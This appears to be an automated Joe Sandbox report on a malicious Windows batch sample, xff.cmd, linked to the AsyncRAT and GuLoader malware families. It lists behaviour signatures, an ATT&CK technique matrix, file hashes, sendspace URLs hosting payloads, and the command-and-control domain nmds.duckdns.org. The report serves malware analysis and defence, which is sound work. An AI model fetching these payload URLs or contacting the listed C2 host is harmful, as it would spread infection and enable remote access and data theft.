              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: Amcache.hve.23.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.23.dr; Binary or memory string: msmpeng.exe
              Source: Amcache.hve.23.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.23.dr; Binary or memory string: MsMpEng.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara match; File source: 0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: wab.exe PID: 8172, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match; File source: 0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: wab.exe PID: 8172, type: MEMORYSTR
              | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
              | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
              | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 112 Process Injection | 1 Masquerading | OS Credential Dumping | 31 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
              | Credentials | Domains | Default Accounts | 11 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
              | Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
              | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 112 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
              | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | 213 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
              | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 14 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
[Behavior graph, not reproduced here. Behavior Graph ID: 1446785; Sample: xff.cmd; Startdate: 23/05/2024; Architecture: WINDOWS; Score: 100. Process chain shown: cmd.exe -> powershell.exe -> powershell.exe -> wab.exe -> WerFault.exe.]

Source | Detection | Scanner | Label | Link
xff.cmd | 3% | ReversingLabs | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://upx.sf.net | 0% | URL Reputation | safe |
https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://www.sendspace.com/pro/dl/ougyql | 0% | Avira URL Cloud | safe |
https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80.bin | 0% | Avira URL Cloud | safe |
https://fs03n4.sendspace.com/ | 0% | Avira URL Cloud | safe |
http://www.sendspace.com | 0% | Avira URL Cloud | safe |
https://www.sendspace.com | 0% | Avira URL Cloud | safe |
http://www.microsoft.co | 0% | Avira URL Cloud | safe |
https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80 | 0% | Avira URL Cloud | safe |
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
https://fs13n3.sendspace.com/dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb | 0% | Avira URL Cloud | safe |
https://fs03n4.sendspace.com/yK | 0% | Avira URL Cloud | safe |
https://www.sendspace.com/ | 0% | Avira URL Cloud | safe |
https://fs13n3.sendspace.com | 0% | Avira URL Cloud | safe |
https://fs03n4.sendspace.com/A | 0% | Avira URL Cloud | safe |
nmds.duckdns.org | 100% | Avira URL Cloud | malware |
http://fs13n3.sendspace.com | 0% | Avira URL Cloud | safe |
https://www.sendspace.com/pro/dl/ow9148 | 0% | Avira URL Cloud | safe |
https://www.sendspace.com/pro/dl/ow9148P | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
fs03n4.sendspace.com | 69.31.136.17 | true | false | | unknown
fs13n3.sendspace.com | 69.31.136.57 | true | false | | unknown
nmds.duckdns.org | 12.202.180.134 | true | true | | unknown
www.sendspace.com | 104.21.28.80 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.sendspace.com/pro/dl/ougyql | false | Avira URL Cloud: safe | unknown
https://fs13n3.sendspace.com/dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb | false | Avira URL Cloud: safe | unknown
https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80.bin | false | Avira URL Cloud: safe | unknown
nmds.duckdns.org | true | Avira URL Cloud: malware | unknown
https://www.sendspace.com/pro/dl/ow9148 | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs03n4.sendspace.com/yK | wab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000003.00000002.1788126978.000002AD42A5D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80 | wab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.00000000075AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.00000000075C0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.0000000007591000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1665443342.00000000075CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft.co | powershell.exe, 0000000C.00000002.1675028556.0000000006D81000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://upx.sf.net | Amcache.hve.23.dr | false | URL Reputation: safe | unknown
http://www.sendspace.com | powershell.exe, 00000003.00000002.1788126978.000002AD4357B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs03n4.sendspace.com/ | wab.exe, 0000000F.00000003.1665443342.00000000075CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com | powershell.exe, 00000003.00000002.1788126978.000002AD43086000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD419ED000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/ | wab.exe, 0000000F.00000002.3121592482.0000000007558000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 0000000C.00000002.1669254293.00000000043A1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs03n4.sendspace.com/A | wab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/ow9148P | powershell.exe, 00000003.00000002.1788126978.000002AD419ED000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://fs13n3.sendspace.com | powershell.exe, 00000003.00000002.1788126978.000002AD435B4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs13n3.sendspace.com | powershell.exe, 00000003.00000002.1788126978.000002AD41C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD435A0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000003.00000002.1788126978.000002AD417C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.1788126978.000002AD417C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1669254293.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
69.31.136.17 | fs03n4.sendspace.com | United States | 3257 | GTT-BACKBONEGTTDE | false
12.202.180.134 | nmds.duckdns.org | United States | 22983 | FISERV-INCUS | true
104.21.28.80 | www.sendspace.com | United States | 13335 | CLOUDFLARENETUS | false
69.31.136.57 | fs13n3.sendspace.com | United States | 3257 | GTT-BACKBONEGTTDE | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1446785
Start date and time: 2024-05-23 21:07:18 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: xff.cmd
Detection: MAL
Classification: mal100.troj.evad.winCMD@14/14@4/4
                      EGA Information:
                      • Successful, ratio: 33.3%
                      HCA Information:
                      • Successful, ratio: 91%
                      • Number of executed functions: 57
                      • Number of non-executed functions: 7
                      Cookbook Comments:
                      • Found application associated with file extension: .cmd
                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 20.42.73.29
                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target powershell.exe, PID 4904 because it is empty
                      • Execution Graph export aborted for target powershell.exe, PID 7776 because it is empty
                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.
                      • VT rate limit hit for: xff.cmd
Time | Type | Description
15:08:06 | API Interceptor | 540x Sleep call for process: powershell.exe modified
15:08:51 | API Interceptor | 2535869x Sleep call for process: wab.exe modified
15:11:13 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
69.31.136.17 | las.cmd | malicious | GuLoader |
69.31.136.17 | zap.cmd | malicious | GuLoader, XWorm |
69.31.136.17 | xff.cmd | malicious | AsyncRAT, GuLoader |
69.31.136.17 | new.cmd | malicious | GuLoader |
69.31.136.17 | las.cmd | malicious | GuLoader |
69.31.136.17 | zap.cmd | malicious | GuLoader, XWorm |
69.31.136.17 | kam.cmd | malicious | GuLoader |
69.31.136.17 | upload.vbs | malicious | GuLoader, XWorm |
69.31.136.17 | update.vbs | malicious | GuLoader, XWorm |
69.31.136.17 | file.vbs | malicious | GuLoader |
12.202.180.134 | zap.cmd | malicious | Unknown |
12.202.180.134 | zap.cmd | malicious | GuLoader, XWorm |
12.202.180.134 | update.cmd | malicious | Unknown |
12.202.180.134 | xff.cmd | malicious | AsyncRAT, GuLoader |
12.202.180.134 | new.cmd | malicious | GuLoader |
12.202.180.134 | las.cmd | malicious | GuLoader |
12.202.180.134 | kam.cmd | malicious | Unknown |
12.202.180.134 | sample.cmd | malicious | Unknown |
12.202.180.134 | zap.cmd | malicious | GuLoader, XWorm |
12.202.180.134 | xff.cmd | malicious | Unknown |
104.21.28.80 | xff.cmd | malicious | AsyncRAT, GuLoader |
104.21.28.80 | zap.cmd | malicious | GuLoader, XWorm |
104.21.28.80 | las.cmd | malicious | GuLoader |
104.21.28.80 | kam.cmd | malicious | GuLoader |
104.21.28.80 | upload.vbs | malicious | GuLoader, XWorm |
104.21.28.80 | update.vbs | malicious | GuLoader, XWorm |
104.21.28.80 | file.vbs | malicious | GuLoader |
104.21.28.80 | windows.vbs | malicious | AsyncRAT, GuLoader |
104.21.28.80 | update.vbs | malicious | GuLoader |
69.31.136.57 | las.cmd | malicious | GuLoader |
69.31.136.57 | zap.cmd | malicious | GuLoader, XWorm |
69.31.136.57 | xff.cmd | malicious | AsyncRAT, GuLoader |
69.31.136.57 | new.cmd | malicious | GuLoader |
69.31.136.57 | xff.cmd | malicious | AsyncRAT, GuLoader |
69.31.136.57 | las.cmd | malicious | GuLoader, XWorm |
69.31.136.57 | las.cmd | malicious | GuLoader |
69.31.136.57 | kam.cmd | malicious | GuLoader |
69.31.136.57 | windows.vbs | malicious | GuLoader, XWorm |
69.31.136.57 | file.vbs | malicious | GuLoader, XWorm |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
nmds.duckdns.org | xff.cmd | malicious | Unknown | 12.202.180.134
nmds.duckdns.org | 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe | malicious | XWorm | 87.121.105.4
nmds.duckdns.org | kam.cmd | malicious | Unknown | 87.121.105.4
nmds.duckdns.org | windows.vbs | malicious | XWorm | 87.121.105.4
fs03n4.sendspace.com | new.cmd | malicious | GuLoader | 69.31.136.17
fs03n4.sendspace.com | las.cmd | malicious | GuLoader | 69.31.136.17
fs03n4.sendspace.com | kam.cmd | malicious | GuLoader | 69.31.136.17
fs03n4.sendspace.com | 1st_Payment.vbs | malicious | Revenge | 69.31.136.17
fs13n3.sendspace.com | zap.cmd | malicious | GuLoader, XWorm | 69.31.136.57
fs13n3.sendspace.com | new.cmd | malicious | GuLoader | 69.31.136.57
fs13n3.sendspace.com | las.cmd | malicious | GuLoader | 69.31.136.57
fs13n3.sendspace.com | file.vbs | malicious | GuLoader, XWorm | 69.31.136.57
fs13n3.sendspace.com | 1st_Payment_Copy.vbs | malicious | Unknown | 69.31.136.57
www.sendspace.com | las.cmd | malicious | GuLoader | 172.67.170.105
www.sendspace.com | zap.cmd | malicious | GuLoader, XWorm | 172.67.170.105
www.sendspace.com | xff.cmd | malicious | AsyncRAT, GuLoader | 104.21.28.80
www.sendspace.com | new.cmd | malicious | GuLoader | 172.67.170.105
www.sendspace.com | las.cmd | malicious | GuLoader | 172.67.170.105
www.sendspace.com | kam.cmd | malicious | GuLoader | 172.67.170.105
www.sendspace.com | zap.cmd | malicious | GuLoader, XWorm | 104.21.28.80
www.sendspace.com | xff.cmd | malicious | AsyncRAT, GuLoader | 172.67.170.105
www.sendspace.com | las.cmd | malicious | GuLoader, XWorm | 172.67.170.105
www.sendspace.com | las.cmd | malicious | GuLoader | 104.21.28.80
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                    No context
                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.309724752519977
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:vB8UEukIT0BU/gjCXh08XTlzuiFxZ24IO8E:53EukfBU/gjv8XxzuiFxY4IO8E
                                                                                                    MD5:493F6371C983AE8DD4E14F6FEFA2C55D
                                                                                                    SHA1:DA9998B070AED1E8FB12114346E9405B93E6C841
                                                                                                    SHA-256:E22ACE2FF0D864B74DB9D0EB59AE54D7CFD20BE30666B49BDBE0387317E4FCC6
                                                                                                    SHA-512:E160C014D4447B07B547F647236B07FF5F95FC35091A74F77758011A7B73FD5469608346A57FF2C0B01573E853F9A4AAD941505DFBDFDDD5E42C390D17389D76
                                                                                                    Malicious:false
                                                                                                    Reputation:low
Preview:
Version=1
EventType=CLR20r3
EventTime=133609650649559671
ReportType=2
Consent=1
UploadTime=133609650656591007
ReportStatus=524384
ReportIdentifier=cdb68d28-d70a-498a-b55d-9a153f3a7274
IntegratorReportIdentifier=c7c2ba6e-76bb-4d9d-bfab-c289bf2b6f89
Wow64Host=34404
Wow64Guest=332
NsAppName=wab.exe
OriginalFilename=WAB.EXE
AppSessionGuid=00001fec-0001-0013-64e8-4e9d44adda01
TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000677a3566789d4da5459a1ecd01a297c261a133a2!wab.exe
                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                    File Type:Mini DuMP crash report, 14 streams, Thu May 23 19:11:05 2024, 0x1205a4 type
                                                                                                    Category:dropped
                                                                                                    Size (bytes):383886
                                                                                                    Entropy (8bit):3.5142920877131267
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:jwo3xC2fc4uEqByTIfLTgLGzbuL8Fb2VKkrIGPqobo:jwcxC2fc4sysTgLG3uQFb7krI7/
                                                                                                    MD5:AA91C7626F27A3A26D6DDB2D353E94DE
                                                                                                    SHA1:592C4AD29DC054437526DDFE51106A8F2A984FF9
                                                                                                    SHA-256:491AE3D1BF08045C99A846B307BD79CB3370F8C591B94280EBCDACD7781EA5A3
                                                                                                    SHA-512:0DEFF178C6E033D8388258AC49C6065612996E31B2D42398ACEFB4CA5B64029A384133AA0434398D4E12FFA21880FD334183FF9743B653325B039F01654B24D5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6376
                                                                                                    Entropy (8bit):3.7172282008724187
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:RSIU6o7wVetbBJY6s8eYZAQE/4Art5aM4UOb89bPpsfkulm:R6l7wVeJBJY62YZALpry89bPpsfblm
                                                                                                    MD5:6CAC37DFDBEAFA8E75781476E29D641E
                                                                                                    SHA1:D463DF3B748CE71B91A0925EB61DEF29306CFD6F
                                                                                                    SHA-256:260A0F62B7A0FB99A3363DFD796FC7CB223B47A2E09AD5DBB69022D5EC0DEBAB
                                                                                                    SHA-512:9AB2CFDFF813B77306CC12779CA23DEE967DE7AFA80E48699ED3D5C5F46F437508E77C42A8C814A43769B0DE707D46DF9B0475273E16015822A7084E0233DADD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
Preview:
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
  <OSVersionInformation>
    <WindowsNTVersion>10.0</WindowsNTVersion>
    <Build>19045</Build>
    <Product>(0x30): Windows 10 Pro</Product>
    <Edition>Professional</Edition>
    <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
    <Revision>2006</Revision>
    <Flavor>Multiprocessor Free</Flavor>
    <Architecture>X64</Architecture>
    <LCID>2057</LCID>
  </OSVersionInformation>
  <ProcessInformation>
    <Pid>8172</Pi
                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4703
                                                                                                    Entropy (8bit):4.432919742684411
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:cvIwWl8zsXJg77aI9XWT1nWpW8VYCYm8M4JCyF8+q8vKw7I4ud:uIjf5I7pWTc7VqJMKHk4ud
                                                                                                    MD5:12A8A866DED27F71FDD761DF032CF0EC
                                                                                                    SHA1:7894F594AE628F2163279406E4A823629BFBA8E9
                                                                                                    SHA-256:96B8D00CDE79A7171129A016479F8502E2EE4368C119B0D33ECFF72CB9DC1C15
                                                                                                    SHA-512:1693552B68AF3A6BB2683C6656BB80F39032F514BBA070253A3B29B61B8D145DF630931156126A373BCA48D1E6CF1907CAC34F00DB7B4D898C0E03F4123D073D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="336133" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):11608
                                                                                                    Entropy (8bit):4.8908305915084105
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                                                                    MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                                                                    SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                                                                    SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                                                                    SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                                                                    Malicious:false
                                                                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):1.1940658735648508
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:NlllulnmWllZ:NllUmWl
                                                                                                    MD5:3EBBEC2F920D055DAC842B4FF84448FA
                                                                                                    SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
